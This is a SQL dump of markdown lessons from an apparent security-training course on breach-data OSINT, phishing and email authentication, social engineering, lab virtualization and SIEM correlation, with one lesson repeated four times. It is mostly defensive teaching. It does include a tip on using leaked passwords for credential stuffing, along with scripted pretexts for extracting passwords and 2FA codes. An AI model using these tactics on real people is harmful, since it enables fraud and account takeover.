(544, 186, '## Breach Data & E-mail OSINT\n\n### HaveIBeenPwned (HIBP)\nTroy Hunt\'s database.\n*   Enter an email. It tells you which breaches it was in (Adobe, LinkedIn, Canva).\n*   It does **not** give you the password.\n\n### DeHashed / IntelX\nThese are paid/grey-hat services that **do** show the password (hashed or cleartext).\n*   **Use Case**: Red Teamers use this to credential stuff. \"I see Bob\'s password in 2012 was `Mustang2012`. I bet his password today is `Mustang2025!`\".\n\n### IMINT (Image Intelligence)\n*   **Geolocation**: Analyzing a photo to find where it was taken.\n    *   *Shadows*: Time of day.\n    *   *Power Plugs*: Country.\n    *   *Signage*: Language/Street names.\n*   **EXIF Data**: Metadata inside the JPG. (GPS coordinates, Camera Model). Most social media strips this, but direct uploads to blogs might not.', 'markdown', 15, '2025-12-26 22:15:16', '2025-12-29 14:04:25'),
(545, 187, '## Breach Data & E-mail OSINT\n\n### HaveIBeenPwned (HIBP)\nTroy Hunt\'s database.\n*   Enter an email. It tells you which breaches it was in (Adobe, LinkedIn, Canva).\n*   It does **not** give you the password.\n\n### DeHashed / IntelX\nThese are paid/grey-hat services that **do** show the password (hashed or cleartext).\n*   **Use Case**: Red Teamers use this to credential stuff. \"I see Bob\'s password in 2012 was `Mustang2012`. I bet his password today is `Mustang2025!`\".\n\n### IMINT (Image Intelligence)\n*   **Geolocation**: Analyzing a photo to find where it was taken.\n    *   *Shadows*: Time of day.\n    *   *Power Plugs*: Country.\n    *   *Signage*: Language/Street names.\n*   **EXIF Data**: Metadata inside the JPG. (GPS coordinates, Camera Model). Most social media strips this, but direct uploads to blogs might not.', 'markdown', 15, '2025-12-26 22:15:16', '2025-12-29 14:04:25'),
(546, 188, '## Breach Data & E-mail OSINT\n\n### HaveIBeenPwned (HIBP)\nTroy Hunt\'s database.\n*   Enter an email. It tells you which breaches it was in (Adobe, LinkedIn, Canva).\n*   It does **not** give you the password.\n\n### DeHashed / IntelX\nThese are paid/grey-hat services that **do** show the password (hashed or cleartext).\n*   **Use Case**: Red Teamers use this to credential stuff. \"I see Bob\'s password in 2012 was `Mustang2012`. I bet his password today is `Mustang2025!`\".\n\n### IMINT (Image Intelligence)\n*   **Geolocation**: Analyzing a photo to find where it was taken.\n    *   *Shadows*: Time of day.\n    *   *Power Plugs*: Country.\n    *   *Signage*: Language/Street names.\n*   **EXIF Data**: Metadata inside the JPG. (GPS coordinates, Camera Model). Most social media strips this, but direct uploads to blogs might not.', 'markdown', 15, '2025-12-26 22:15:16', '2025-12-29 14:04:25'),
(547, 189, '## Breach Data & E-mail OSINT\n\n### HaveIBeenPwned (HIBP)\nTroy Hunt\'s database.\n*   Enter an email. It tells you which breaches it was in (Adobe, LinkedIn, Canva).\n*   It does **not** give you the password.\n\n### DeHashed / IntelX\nThese are paid/grey-hat services that **do** show the password (hashed or cleartext).\n*   **Use Case**: Red Teamers use this to credential stuff. \"I see Bob\'s password in 2012 was `Mustang2012`. I bet his password today is `Mustang2025!`\".\n\n### IMINT (Image Intelligence)\n*   **Geolocation**: Analyzing a photo to find where it was taken.\n    *   *Shadows*: Time of day.\n    *   *Power Plugs*: Country.\n    *   *Signage*: Language/Street names.\n*   **EXIF Data**: Metadata inside the JPG. (GPS coordinates, Camera Model). Most social media strips this, but direct uploads to blogs might not.', 'markdown', 15, '2025-12-26 22:15:16', '2025-12-29 14:04:25'),
(548, 190, '# Module 18 Final Quiz\n\nTest your mastery of Open Source Intelligence.\n\n## Instructions\n*   **20 Questions**.\n*   Covering: Fundamentals, Dorking, People, Tools, and Ethics.\n\nGood Luck, Detective!', 'markdown', 15, '2025-12-26 22:15:16', '2025-12-26 22:15:16'),
(549, 191, '## Email Anatomy: RFC 5322\n\nTo stop phishing, you must read the **Header**.\n\n### The Envelope vs The Letter\n*   **Envelope (SMTP)**: `MAIL FROM: attacker@evil.com`. (The server reads this).\n*   **Letter (Header)**: `From: \"CEO\" <ceo@company.com>`. (The user reads this).\n*   **Spoofing**: The attacker puts their real address on the Envelope (so the email arrives) but puts the CEO\'s address on the Letter (so the victim is tricked).\n\n### Key Header Fields\n*   **Received**: The hop-by-hop path. Read from **Bottom to Top**.\n    *   `Received: from mail.evil.com [1.2.3.4]` -> **True Source**.\n*   **Reply-To**: Often different from \"From\".\n    *   \"From: HelpDesk\"\n    *   \"Reply-To: hacker@gmail.com\"\n*   **X-Mailer**: The software used.\n    *   `PHP/7.4` -> Suspicious. Normal people use Outlook/Gmail, not PHP scripts.', 'markdown', 15, '2025-12-26 22:17:47', '2025-12-29 16:32:38'),
(550, 192, '## Authentication: SPF, DKIM, DMARC\n\nThe Trinity of Email Security.\n\n### 1. SPF (Sender Policy Framework)\n*   **Identity Card**.\n*   DNS TXT Record: `v=spf1 include:_spf.google.com -all`\n*   **Meaning**: \"Only Google\'s servers are allowed to send email for my domain. Reject everyone else.\"\n*   **Check**: Look for `Authentication-Results: spf=pass` in the header.\n\n### 2. DKIM (DomainKeys Identified Mail)\n*   **Wax Seal**.\n*   Cryptographic signature attached to the email.\n*   **Meaning**: \"This email has not been modified in transit.\"\n*   **Check**: Look for `dkim=pass`.\n\n### 3. DMARC (Domain-based Message Authentication)\n*   **The Policy**.\n*   \"If SPF fails OR DKIM fails, what should I do?\"\n    *   `p=none`: Do nothing (Analysis mode).\n    *   `p=quarantine`: Send to Spam folder.\n    *   `p=reject`: Bounce the email (Delete it).\n*   **Goal**: Every company wants to be at `p=reject`.', 'markdown', 15, '2025-12-26 22:17:47', '2025-12-29 16:32:38'),
(551, 193, '## The CEO Fraud (BEC)\n\n**Business Email Compromise (BEC)** causes more financial loss than Ransomware.\n\n### The Scenario\n*   **Target**: The CFO (Finance Director).\n*   **Attacker**: Impersonates the CEO.\n*   **Email**: \"Hi Bob, I am in a meeting. Be discreet. I need you to wire $50k to this vendor immediately. It is for a secret acquisition.\"\n\n### Indicators\n1.  **Urgency**: \"Immediately\", \"Secret\", \"Before the cutoff\".\n2.  **Authority**: Leveraging the CEO\'s title to bypass procedures.\n3.  **Spoofing**: Look closely at the email.\n    *   `ceo@company-corp.com` (Typosquatting).\n    *   `ceo@company.com` (Display Name Spoofing).\n\n### Defense\n*   **Process**: \"Any wire transfer over $10k requires voice verification.\"\n*   **Tagging**: Add `[EXTERNAL]` tag to email subject lines.', 'markdown', 15, '2025-12-26 22:17:47', '2025-12-29 16:32:38'),
(552, 194, '## Investigation: Malicious Attachments\n\n### Common File Types\n1.  **.exe / .scr / .bat**: Executables. Usually blocked by gateway.\n2.  **.docm / .xlsm**: Office Macros. Very common.\n    *   User opens Doc -> Click \"Enable Content\" -> Macro runs PowerShell -> Downloads Malware.\n3.  **.zip / .iso**: Containers. Used to bypass scanners.\n4.  **.html**: HTML Smuggling. The file decodes itself in the browser.\n\n### Analysis Tools\n1.  **Talos File Reputation**: Check the hash.\n2.  **OLEVBA**: Python tool to extract Macros from Office docs.\n3.  **Any.Run / Joe Sandbox**: Detonate the file in a sandbox and watch the video.', 'markdown', 15, '2025-12-26 22:17:47', '2025-12-29 14:04:25'),
(553, 195, '## Investigation: Credential Harvesting\n\n**Goal**: Steal username/password.\n\n### Mechanism\n1.  **The Hook**: \"Your Office 365 password has expired. Click here to keep same password.\"\n2.  **The Line**: Link goes to `microsoft-login-secure.com` (Phishing Site).\n3.  **The Sinker**: Site looks 100% like Microsoft. User types creds. Site saves them and redirects user to real Microsoft.\n\n### Indicators\n*   **URL Analysis**: Look at the domain. Is it `microsoft.com`?\n*   **HTTPS**: Phishing sites DO use HTTPS (Green lock). Keys are free from Let\'s Encrypt. Do not trust the lock.\n*   **Brand**: Use of official logos.', 'markdown', 15, '2025-12-26 22:17:47', '2025-12-29 14:04:25'),
(554, 196, '## Phishing Final Assessment\nCheck your knowledge on SPF, DMARC, and Analysis techniques.', 'markdown', 15, '2025-12-26 22:17:47', '2025-12-29 14:04:25'),
(555, 201, '## Psychology of Persuasion\n\nSocial Engineering hacks the *human*, not the machine.\nRobert Cialdini defined 6 principles.\n\n### 1. Authority\n\"I am the VP of IT. Do what I say.\"\n*   People obey authority figures automatically.\n\n### 2. Urgency / Scarcity\n\"Your account will be deleted in 1 hour.\"\n*   Panic shuts down critical thinking.\n\n### 3. Reciprocity\n\"I helped you with that ticket last week. Can you help me now?\"\n*   Social debt.\n\n### 4. Liking\n\"Wow, you like the Yankees too?\"\n*   We trust people we like.\n\n### 5. Social Proof\n\"Everyone else in the department has already done the survey.\"\n*   Herd mentality.\n\n### 6. Commitment\n\"Can you just answer one small question?\" -> \"Okay, verify your password.\"\n*   Foot-in-the-door technique.', 'markdown', 15, '2025-12-26 22:28:54', '2025-12-29 16:32:38'),
(556, 202, '## Pretexting and Impersonation\n\nCreating a scenario (The Pretext).\n\n### The IT Support Scam\n*   **Role**: New IT Helpdesk Guy.\n*   **Pretext**: \"Hey, we are migrating servers and your account is desynchronized. I need to verify your password.\"\n*   **Why it works**: Employees are trained to help IT.\n\n### Defense\n**Authentication**.\n\"Can you verify your employee ID?\"\n\"I will call you back on the internal extension listed in the directory.\" (The attacker hates this).', 'markdown', 15, '2025-12-26 22:28:54', '2025-12-29 14:06:41'),
(557, 203, '## Vishing (Voice Phishing)\n\nHacking over the phone.\n\n### The Deepfake Era\n*   AI can now clone voices with 3 seconds of audio.\n*   \"Hi Mom, I\'m in jail, send money.\" (Grandparent Scam).\n*   \"Hi Process Team, this is the CEO, approve the transaction.\"\n\n### Techniques\n1.  **Caller ID Spoofing**: Making the phone show \"Internal IT Helpdesk\".\n2.  **Background Noise**: Playing office sounds (typing, printers) to verify the lie.\n\n### Defense\n*   **Callback Policy**: \"I need to verify. I will hang up and call you back at your internal extension listed in the directory.\"\n    *   If they resist (\"No, I am on my cell!\"), it is a scam.\n*   **Challenge-Response**: \"What is the daily code word?\"', 'markdown', 15, '2025-12-26 22:28:54', '2025-12-29 16:32:38'),
(558, 204, '## Smishing (SMS Phishing)\n\nTexts are trusted more than emails.\n\n### Delivery Package Scam\n\"USPS: We missed your delivery. Click here to reschedule: `usps-track-package.com`.\"\n*   **Payload**: Credit Card theft (small fee to reschedule) or Android Malware download.\n\n### 2FA Intercept\n\"Your bank account is compromised. Please read me the code sent to your phone to verify identity.\"\n*   **Reality**: The attacker has your password. The code is the 2FA login token. If you read it, they are in.', 'markdown', 15, '2025-12-26 22:28:54', '2025-12-29 14:06:41'),
(559, 205, '## Physical: Tailgating & Dumpster Diving\n\n### Tailgating (Piggybacking)\n*   **Concept**: Walking in behind someone who has badged in.\n*   **Exploit**: \"Hold the door!\" (Kindness).\n*   **Defense**: \"One Badge, One Entry\" policy. Even if it is rude, shut the door.\n\n### Dumpster Diving\n*   **Concept**: Looking through trash.\n*   **Target**: Org Charts, Sticky notes with passwords, Bank statements, Vendor invoices.\n*   **Defense**:\n    *   **Shred Everything**.\n    *   Secure Trash Bins (Locked).\n\n### USB Drops (Baiting)\n*   Dropping a USB key labeled \"Payroll 2025\" in the parking lot.\n*   Curiosity kills the cat (and the network).\n*   **Defense**: Disable USB Mass Storage via Group Policy.', 'markdown', 15, '2025-12-26 22:28:54', '2025-12-29 16:32:38'),
(560, 206, '## Baiting and Quid Pro Quo\n\n### Baiting (The USB Drop)\nLeaving a USB drive labeled \"Payroll 2024\" or \"Layoff Plan\" in the parking lot.\n*   **Impact**: Curiosity > Security. Victim plugs it in. Malware auto-runs.\n*   **Defense**: Glue USB ports shut (Extreme) or Disable Mass Storage via GPO.\n\n### Quid Pro Quo\n\"Something for Something\".\n*   \"Take this survey and win a free Chocolate Bar.\" (Password is one of the survey questions).', 'markdown', 15, '2025-12-26 22:28:54', '2025-12-29 14:06:41');
INSERT INTO `lesson_content` (`id`, `task_id`, `content`, `content_type`, `reading_time_minutes`, `created_at`, `updated_at`) VALUES
(561, 207, '## Social Engineering Final Quiz\nTest your ability to spot the lie.', 'markdown', 15, '2025-12-26 22:28:54', '2025-12-29 14:06:41'),
(562, 211, '## Introduction to Virtualization\n\n**Virtualization** is the magic that runs the cloud.\nIt allows one physical computer (Host) to run multiple fake computers (Guests).\n\n### Physical vs Virtual\n*   **Physical**: One OS controls the hardware directly. If the OS crashes, the machine stops.\n*   **Virtual**: A **Hypervisor** sits between the hardware and the OS.\n    *   It slices the RAM (16GB -> 4GB for VM1, 4GB for VM2).\n    *   It slices the CPU time.\n\n### Why do we use it in Security?\n1.  **Isolation**: If you run malware in a VM, it cannot infect your real laptop (usually).\n2.  **Snapshots**: You can save the state. If you delete `System32` by accident, just click \"Revert\".\n3.  **Efficiency**: You can run a Windows DC, a Linux Web Server, and a Kali Attacker all on one laptop.', 'markdown', 10, '2025-12-26 22:32:26', '2025-12-29 16:32:49'),
(563, 212, '## Hypervisors: Type 1 vs Type 2\n\nThe software that runs VMs.\n\n### Type 1 (Bare Metal)\n*   **Installs**: Directly on the hardware. NO Windows/MacOS underneath.\n*   **Performance**: Extremely fast.\n*   **Usage**: Enterprise/Servers.\n*   **Examples**: VMware ESXi, Microsoft Hyper-V (Server), Proxmox.\n\n### Type 2 (Hosted)\n*   **Installs**: Like an app on your existing OS.\n*   **Performance**: Slower (overhead of the Host OS).\n*   **Usage**: Laptops/Desktops.\n*   **Examples**: VMware Workstation, Oracle VirtualBox.\n*   **Student Lab**: You will use Type 2 (VirtualBox) because you don\'t want to wipe your laptop.', 'markdown', 10, '2025-12-26 22:32:26', '2025-12-29 16:32:49'),
(564, 213, '## Setting Up VirtualBox (Free)\n\nOracle VirtualBox is the most popular free hypervisor.\n\n### Installation Steps\n1.  Download from virtualbox.org.\n2.  Install the **Extension Pack** (Critical! This gives you USB support and better drivers).\n3.  Enable **Virtualization Technology (VT-x / AMD-V)** in your BIOS.\n    *   *Error*: If you get \"Verr_VMX_No_VMX\", restart computer, go to BIOS, enable VT-x.\n\n### Common Settings\n*   **RAM**: Give it 2GB-4GB (Don\'t starve your host).\n*   **CPU**: Give it 2 Cores.\n*   **Video Memory**: Max it out (128MB) for smooth UI.', 'markdown', 10, '2025-12-26 22:32:26', '2025-12-29 16:32:49'),
(565, 214, '## VMware Workstation (Pro/Player)\n\nThe industry standard for desktop virtualization.\n\n### Benefits over VirtualBox\n*   **Better 3D Acceleration**: Smoother UI.\n*   **Unity Mode**: Run Linux apps directly on your Windows desktop window.\n*   **Compatibility**: Most enterprise appliances (OVF) are built for VMware.\n*   **Networking**: More stable NAT engine.\n\n### Free vs Pro\n*   **Player**: Free for personal use. Can run VMs. Cannot creating complicated networks.\n*   **Pro**: Paid. Full snapshot trees, Network Editor (Virtual Network Editor is powerful).', 'markdown', 10, '2025-12-26 22:32:26', '2025-12-29 14:04:25'),
(566, 215, '## Creating Your First VM (Kali Linux)\n\n**Kali Linux** is the standard OS for penetration testing.\n\n### The Easy Way (OVA)\n1.  Download the **Kali Linux VirtualBox Image** (not the ISO installer).\n2.  It comes as a `.ova` file.\n3.  Double click the file. VirtualBox imports it instantly with all settings correct.\n4.  User/Pass: `kali` / `kali`.\n\n### The Hard Way (ISO)\n1.  Create New VM \"Linux / Debian 64-bit\".\n2.  Mount the ISO file as a CD-ROM.\n3.  Boot and run the installer manually.\n*   *Why do this?* If you want a custom, lightweight install.', 'markdown', 10, '2025-12-26 22:32:26', '2025-12-29 16:32:49'),
(567, 216, '## Network Modes: NAT, Bridged, Host-Only\n\nThis confuses everyone.\n\n### 1. NAT (Default)\n*   **Analogy**: Your VM is behind a router (your Host).\n*   **Access**:\n    *   VM -> Internet: YES.\n    *   Internet -> VM: NO.\n    *   Host -> VM: NO (Tricky, requires port forwarding).\n*   *Use*: Just browsing the web.\n\n### 2. Bridged\n*   **Analogy**: Your VM plugs a cable directly into your home Wi-Fi router.\n*   **Result**: It gets its own IP on your LAN (e.g., `192.168.1.50`).\n*   **Access**: Everyone can talk to everyone.\n*   *Use*: If you want to SSH into it from another laptop.\n\n### 3. Host-Only\n*   **Analogy**: A private cable between Host and VM only. No Internet.\n*   **Access**: Extremely secure.\n*   *Use*: Malware Analysis (So the malware can\'t phone home).', 'markdown', 10, '2025-12-26 22:32:26', '2025-12-29 16:32:49'),
(568, 217, '## Snapshots & Clones (The Safety Net)\n\n### Snapshots\n*   A \"Save Game\" point.\n*   **Workflow**:\n    1.  Install Windows.\n    2.  Take Snapshot \"Fresh Install\".\n    3.  Run Ransomware. (PC destroyed).\n    4.  Revert to \"Fresh Install\". (PC fixed in 10 seconds).\n*   *Warning*: Snapshots consume disk space over time.\n\n### Clones\n*   **Full Clone**: A complete copy (takes space). Independent.\n*   **Linked Clone**: A shortcut referencing the parent. Fast, saves space, but if you delete the parent, the clone breaks.', 'markdown', 10, '2025-12-26 22:32:26', '2025-12-29 16:32:49'),
(569, 221, '## The Central Nervous System of Security\n\n**Security Information and Event Management (SIEM)** is not just a tool; it is the beating heart of a modern Security Operations Center (SOC). To understand SIEM, we must first understand the problem it solves: **Data Overload and Disconnected Visibility.**\n\n### The Pre-SIEM Nightmare\nImagine you are a security administrator in the year 2005. You are responsible for:\n*   **50 Windows Servers** (generating Windows Event Logs)\n*   **20 Linux Web Servers** (generating Syslog/Apache logs)\n*   **2 Firewalls** (generating proprietary traffic logs)\n*   **1 Antivirus Server** (generating alert logs)\n\nOne day, the CEO\'s laptop is infected with malware. To investigate, you must:\n1.  Remote Desktop into the Antivirus server to see the alert time.\n2.  SSH into the proxy server and `grep` through gigabytes of logs to see what URL the CEO visited.\n3.  Login to the Firewall web interface to see if any strange connections were made out to the internet.\n4.  RDP into the Domain Controller to see if the user account was locked out.\n\nThis process is manual, slow, and impossible to scale. A single firewall can generate **10GB of logs per day**. No human can read that. Furthermore, the \"signal\" of an attack is often split across these devices.\n\n### Enter the SIEM\nA SIEM solves this by unifying your view. It performs three critical functions, often called the \"Trinity of SIEM\":\n\n#### 1. Aggregation (Collection)\nThe SIEM reaches out and grabs logs from *everything*. It acts as a central warehouse.\n*   **Network Devices**: Switches, Routers, Firewalls send Syslog.\n*   **Endpoints**: Windows and Linux servers send OS logs.\n*   **Applications**: Web servers, databases, and custom apps send application logs.\n*   **Security Tools**: IDPS, Antivirus, and DLP solutions send alerts.\n\n#### 2. Normalization (Translation)\nThis is the \"Universal Translator\" function.\n*   **Problem**: A Windows log says `EventID: 4625` (Failed Login). A Linux log says `Failed password for user root`. A Cisco router says `%SEC-6-IPACCESSLOGP`.\n*   **Solution**: The SIEM parses these raw logs and maps them to standard fields.\n    *   `src_ip`: 192.168.1.5\n    *   `user`: admin\n    *   `action`: failure\n    *   `timestamp`: 2023-10-27T10:00:00Z\nNow, you can search for `action=failure` and see results from Windows, Linux, and Cisco all in one view.\n\n#### 3. Correlation (Intelligence)\nThis is the \"Brain\". It connects the dots between seemingly unrelated events.\n*   **Event A (Firewall)**: Inbound connection from 1.2.3.4 on Port 445 (Blocked).\n*   **Event B (VPN)**: Successful login from 1.2.3.4 (Allowed).\n*   **Event C (DC)**: User \"HelpDesk\" added to \"Domain Admins\" group.\n\nIndividually, Event B might look normal. But **Event A + Event B + Event C** appearing within 5 minutes triggers a high-severity **Correlation Rule**: \"External Attack with Privilege Escalation\".\n\n### Why is SIEM Mandatory?\n1.  **Compliance**: Regulations like **PCI-DSS**, **HIPAA**, **SOX**, and **GDPR** explicitly require centralized log management and retention. You cannot pass an audit without it.\n2.  **Forensics**: When a breach is discovered (often months after it happened), the SIEM is the *only* place where you can find historical execution records to trace the attacker\'s path.\n3.  **Real-Time Detection**: It is the only way to detect complex, multi-stage attacks (like APTs) that move laterally across your network.\n\n### The Modern Evolution: SIEM + SOAR + UEBA\nTraditional SIEM had a flaw: it generated too many alerts. Modern SIEMs are evolving into **Security Analytics Platforms**:\n*   **UEBA (User and Entity Behavior Analytics)**: Instead of static rules (\"Alert if > 5 failed logins\"), it uses Machine Learning (\"Alert because Bob never logs in at 3 AM from North Korea\").\n*   **SOAR (Security Orchestration, Automation, and Response)**: Automated actions. If the SIEM sees a virus, the SOAR automatically isolates the computer from the network.\n\n### Summary\nIf the SOC is a castle, the Firewalls are the walls, the EDR is the guards, and the **SIEM is the Watchtower** where the commander sees the entire battlefield.', 'markdown', 15, '2025-12-26 22:35:58', '2025-12-29 15:04:12'),
(570, 222, '## Feeding the Beast: Log Sources & Ingestion\n\nA SIEM is only as good as the data you feed it. As the saying goes: **\"Garbage In, Garbage Out.\"** (Or worse: \"Nothing In, Blindness Out\").\n\n### Types of Log Data\nNot all logs are created equal. A SOC Analyst deals with three primary categories:\n\n#### 1. Event Logs (Structured)\nThese are logs generated by the Operating System. They are highly structured and rich in metadata.\n*   **Windows Event Logs**: The gold standard for endpoint visibility. Stored in binary `.evtx` format.\n    *   *Security*: Logins (`4624`), Process Creation (`4688`), Account Management.\n    *   *System*: Service failures, startup/shutdown.\n    *   *Application*: Errors from SQL Server, IIS, Chrome.\n*   **Linux Syslog**: The standard for Unix-based systems. Usually text-based but follows a facility/severity structure. `/var/log/auth.log` (authentication), `/var/log/syslog` (general).\n\n#### 2. Network Logs (Traffic)\nThese show the \"flow\" of data.\n*   **Firewall Logs**: Allow/Deny decisions. Crucial for perimeter defense.\n*   **NetFlow/IPFIX**: Metadata about traffic (Who, What, Where, When, How much) without the actual packet payload. \"Phone bill\" style records.\n*   **Proxy/DNS Logs**: Provide Layer 7 visibility. URLs visited (`evil.com`), DNS queries made.\n\n#### 3. Security Alerts (Context)\n*   Antivirus detections, IDS/IPS signatures (`ET TROJAN...`), DLP violations.\n\n### Ingestion Methods: Push vs. Pull\n\n#### The PUSH Method (Agents/Forwarders)\nThis is the most common and robust method for servers and endpoints. A small software agent is installed on the device.\n*   **How it works**: The agent watches log files/channels in real-time. When a new line is written, it immediately encrypts and sends it to the SIEM.\n*   **Examples**:\n    *   **Splunk Universal Forwarder (UF)**: Lightweight, reliable.\n    *   **Elastic Winlogbeat**: Sends Windows logs to Elasticsearch.\n    *   **Wazuh Agent**: Performs log collection + FIM + Config assessment.\n*   **Pros**: Real-time, encrypted, can buffer logs if the network goes down (caching).\n*   **Cons**: requires installing software on every endpoint (management overhead).\n\n#### The PULL Method (Agentless)\nUsed for devices where you cannot install software (Routers, Switches, Printers, Appliances).\n*   **WMI (Windows Management Instrumentation)**: The SIEM remotely queries the Windows server to ask for logs. *High overhead, rarely used for logs now.*\n*   **Log Collectors/Concentrators**: A dedicated server sits in the middle. Network devices verify syslog to the Collector. The Collector forwards to the SIEM.\n*   **API Fetching**: Modern Cloud method. The SIEM runs a script every 5 minutes to fetch logs from AWS CloudTrail, Office 365, or Okta APIs.\n\n### The Challenges of Ingestion\n\n#### 1. Time Synchronization (NTP)\nIf your Firewall thinks it is 2:00 PM and your Web Server thinks it is 1:00 PM, correlation is impossible. **NTP (Network Time Protocol)** is critical. All devices must sync to a central, reliable time source.\n\n#### 2. EPS (Events Per Second) & Licensing\nSIEMs are often expensive. Licensing is frequently based on:\n*   **Volume**: GBs of logs ingested per day.\n*   **EPS**: Average events per second.\nA noisy firewall in \"Debug\" mode can bankrupt a SOC by generating millions of useless events. Analysts must tune \"logging levels\" to capture *security-relevant* info without the noise.\n\n#### 3. Bandwidth\nSending full packet captures or debug logs from a satellite office over a T1 line will crash the network. Compression and filtering at the source (Agent) are vital.\n\n### Analyst Tip\nWhen investigating an incident, always ask: **\"What is NOT logging?\"** Attackers frequently disable logging (clearing Event Logs) or stop the Splunk Forwarder service as their first move. A \"Gap in Logs\" is often the biggest indicator of compromise.', 'markdown', 15, '2025-12-26 22:35:58', '2025-12-29 15:04:12'),
(571, 223, '## Making Sense of Chaos: Normalization & Parsing\n\nImagine trying to read a book where every sentence is written in a different language. That is what raw logs look like to a computer.\n\n**Raw Log Example 1 (Cisco ASA Firewall):**\n`Oct 27 10:00:01 firewall-01 %ASA-6-302013: Built inbound TCP connection 1234 for outside:192.168.1.10/4444 (192.168.1.10/4444) to dmz:10.0.0.5/80 (10.0.0.5/80)`\n\n**Raw Log Example 2 (Apache Web Server):**\n`192.168.1.10 - - [27/Oct/2023:10:00:01 +0000] \"GET /index.html HTTP/1.1\" 200 2326`\n\n**Raw Log Example 3 (Windows Event 4624):**\n`Logon Type: 3, Source Network Address: 192.168.1.10, Account Name: Guest`\n\nA human can look at these and deduce that `192.168.1.10` is the \"Source IP\" in all three cases. But a computer cannot. If you search for `src_ip=192.168.1.10`, the computer won\'t find anything unless the logs are **Parsed** and **Normalized**.\n\n### The Parsing Process\nParsing is the act of breaking a raw text string into structured fields using logic (often Regular Expressions or \"Regex\").\n\n**Parsing the Apache Log:**\n*   Raw: `192.168.1.10 - - ...`\n*   Regex Rule: `^(S+) S+ S+ [([w:/]+s[+-]d{4})] \"(S+)s?(S+)?s?(S+)?\" (d{3}|-) (d+|-)`\n*   **Extracted Fields**:\n    *   client_ip: `192.168.1.10`\n    *   timestamp: `27/Oct/2023...`\n    *   method: `GET`\n    *   url: `/index.html`\n    *   status_code: `200`\n\nNow the SIEM understands the data.\n\n### Normalization: The Rosetta Stone\nParsing extracts the data, but **Normalization** standardizes the *names* of the fields.\n*   Vendor A calls it: `source_address`\n*   Vendor B calls it: `src_ip`\n*   Vendor C calls it: `ClientIP`\n*   Vendor D calls it: `c_ip`\n\nIf you are hunting for an IP, you don\'t want to run 4 different queries (`source_address=X OR src_ip=X OR...`).\nNormalization maps ALL of these to a single **Common Information Model (CIM)** field, usually `src_ip` or `source.ip`.\n\n### Why This Matters for Analysts\n1.  **Field Extraction Errors**: Sometimes parsing fails. If a developer changes the log format of an app, the SIEM might stop extracting the username. You will see the raw log, but searches for `user=\"baris\"` will return 0 results. This is a common troubleshooting task for analysts.\n2.  **Performance**: Searching based on indexed fields (`src_ip=1.2.3.4`) is milliseconds fast. Searching raw text (`\"1.2.3.4\"`) is essentially doing `Ctrl+F` on terabytes of text—it is agonizingly slow.\n3.  **Visualizations**: You cannot build a chart of \"Top 10 Bad IPs\" if the IP address isn\'t extracted into a field.\n\n### Common Schemas\n*   **Splunk CIM (Common Information Model)**: The standard for Splunk.\n*   **ECS (Elastic Common Schema)**: The standard for ELK/Elastic.\n*   **OCSF (Open Cybersecurity Schema Framework)**: An emerging open standard backed by AWS, Splunk, and IBM to unify log formats across the industry.\n\n### Scenario\nAn attacker uses a custom tool that generates logs in a format your SIEM hasn\'t seen before.\n*   **Bad Analyst**: Ignores it because it doesn\'t show up in dashboards.\n*   **Good Analyst**: Notices the raw logs, writes a custom Regex parser to extract the `Command_Line` field, and creates a new alert for it.', 'markdown', 15, '2025-12-26 22:35:58', '2025-12-29 15:04:12'),
(572, 224, '## The Magic of Correlation: Finding the Needle in the Stack\n\nCorrelation is the brain of the SIEM. It is the logic engine that evaluates millions of individual events to identify patterns that indicate a security incident.\n\nWithout correlation, you just have a massive library of boring journals. Correlation is the detective reading all those journals to solve the crime.\n\n### The Logic of Correlation rules\nA correlation rule generally follows this Boolean logic structure:\n**IF** (Condition A) **AND** (Condition B) **HAPPENS WITHIN** (Time Window T) **THEN** (Trigger Alert).\n\n#### Example 1: Brute Force Detection\n*   **Raw Event**: Windows Event 4625 (Failed Login).\n*   **Problem**: Users mistype passwords all the time. One event is noise.\n*   **Correlation Rule**:\n    *   `event_id=4625` (Failed Login)\n    *   `count > 10`\n    *   `distinct_destination_user < 2` (Standard Brute force) OR `distinct_destination_user > 10` (Password Spraying)\n    *   `time_window = 5 minutes`\n*   **Meaning**: If the same IP fails to login 10 times in 5 minutes, ALERT.\n\n#### Example 2: The \"Impossible Travel\"\n*   **Event A**: User \"Alice\" logs in from New York (IP 1.2.3.4) at 10:00 AM.\n*   **Event B**: User \"Alice\" logs in from London (IP 5.6.7.8) at 10:15 AM.\n*   **Logic**: Distance between NY and London is 3,400 miles. It is impossible to travel that fast.\n*   **Rule**: IF (Login A success) AND (Login B success) AND (GeoIP distance > 500 miles) AND (Time difference < Flight time) -> ALERT.\n\n#### Example 3: Behavioral Chain (The Kill Chain)\n*   **Step 1**: Firewall detects Port Scan from IP X.\n*   **Step 2**: IDS detects SQL Injection attempt from IP X.\n*   **Step 3**: Web Server records 200 OK (Success) for a large file download to IP X.\n*   **Correlation**: Trigger \"Critical Compromise\" alert. A single IP scanned, exploited, and stole data.\n\n### Tuning: The Analyst\'s Nightmare\nCorrelation rules are prone to two deadly sins:\n\n#### 1. False Positives (The Boy Who Cried Wolf)\nThe rule alerts, but it\'s benign activity.\n*   *Alert*: \"Brute Force Detected!\"\n*   *Reality*: A script running on a server had an expired password and tried to retry connection 50 times in a second.\n*   *Consequence*: Alert Fatigue. Analysts stop paying attention to alerts if 90% are fake.\n\n#### 2. False Negatives (The Silent Killer)\nThe attack happens, but the rule doesn\'t trigger.\n*   *Attack*: Low-and-slow brute force. The attacker tries 1 password every hour.\n*   *Rule Limitation*: The rule was set to \"10 attempts in 5 minutes\". It missed the attack completely.\n*   *Consequence*: Breach.\n\n### Dynamic vs. Static Correlation\n*   **Static**: Rules we explicitly write (`count > 10`). Good for known threats.\n*   **Dynamic (Heuristic/Behavioral)**: The system learns what is \"normal\".\n    *   \"Alice usually downloads 50MB of data a day. Today she downloaded 5GB. ALERT.\"\n    *   This catches \"unknown unknowns\" or zero-days that don\'t match a signature.\n\n### The Role of Context\nCorrelation gets smarter with context.\n*   *Event*: \"Attack from External IP detected against Server A.\"\n*   *Context*: \"Server A is a test server with no sensitive data.\" -> **Low Severity**.\n*   *Context*: \"Server A is the CEO\'s laptop.\" -> **High Severity**.\n*   *Context*: \"Vulnerability Scanner says Server A is patched against this attack.\" -> **False Positive (mostly)**.\n\nA modern SIEM integrates with Asset Management and Vulnerability Scanners to enrich alerts with this context automatically.', 'markdown', 15, '2025-12-26 22:35:58', '2025-12-29 15:04:12'),
